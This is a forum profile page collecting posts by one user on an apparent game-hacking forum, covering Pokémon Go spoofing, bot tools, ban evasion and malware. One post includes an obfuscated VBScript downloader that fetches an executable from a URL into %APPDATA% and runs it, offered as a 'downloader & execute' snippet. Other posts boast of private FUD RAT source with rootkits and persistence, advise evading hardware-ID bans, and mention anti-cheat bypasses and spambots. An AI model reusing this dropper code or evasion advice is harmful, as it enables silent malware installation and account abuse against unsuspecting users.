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Lucky Dice

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Posts posted by Lucky Dice

  1. then have fun getting rid of the pinsirs  :happyforever:


    try zuiderpark in holland ( aka pikachu park ) , just made a 1201 cp raichu :P

    tommorow maybe :D


    can you send me the location ??

  2. u are so fucking clueless, what IP? in 2016 noone base box limiting on IP, its nearly sure hwid...

    anyway, google proxifier and find 2 socks5 proxies, gl

    Hwid changer and VirtualBox should work,what u talk about sock5 proxies wtf!

    I have a list with 500+ of them.

  3. esy pou kolas?den sou exoun ma8ei oti tritos se mia sxesh den xwrei? :happyforever:


    Osoi theloun xorane mallon sou to mathane lathos...

  4. Paid adr does not have spambot. I am able to make any kind of bot. Yet another well informed person thinking that adr is gods given gift to mere mortals.

    It has bypass for smartguard and also there are tons of scripts for spam Pm/Global chat.

  5. Stop google things.

    It's not google it's private source also i have private RAT source with 100% fud runtime , still dont need to slave anyone :D


    + private rootkits 

    + melt

    + protect file

    + peristence


    what else you want to be added??  ;) 


  6. He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

    don't worry. :-[


    Function rPicOdLs(lXIbUjEI)
    Dim ggjZZpyX, MTAIBJTB
    For ggjZZpyX = 1 To LenB(lXIbUjEI)
    MTAIBJTB = MTAIBJTB & Chr(AscB(MidB(lXIbUjEI, ggjZZpyX, 1)))
    rPicOdLs = MTAIBJTB
    End Function
    Sub GcaGHONQ(nPsoiijt, hYSnoocJ)
    Dim bgtlutVY: Set bgtlutVY = CreateObject("MSXML2.ServerXMLHTTP")
    bgtlutVY.Open IUKTVNrC, nPsoiijt, False
    Dim CckSbTkR, iQCADmGv
    Set iQCADmGv = CreateObject("Scripting.FileSystemObject").OpenTextFile(hYSnoocJ, 2, True)
    iQCADmGv.WriteLine (rPicOdLs(bgtlutVY.ResponseBody))
    Set bgtlutVY = Nothing
    Set iQCADmGv = Nothing
    End Sub
    Dim cYczJszK: cYczJszK = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%APPDATA%") & "\Example.exe"
    Dim XhDxOytZ: XhDxOytZ = "http://google.com/server.exe"
    GcaGHONQ XhDxOytZ, cYczJszK
    CreateObject("WScript.Shell").Run Chr(34) & cYczJszK & Chr(34)

    really hard to add a downloader % execute exploit.



  7. Watch out for vorfin (infamous byte) keylogger


    If he got access to the source then he can easily implement a keylogger and share it here in mxc.


    If you get your passwords hacked then you know who is the culplrit!


    Good luck and happy hacking! (or get happy hacked LOL)



    This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

    For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.




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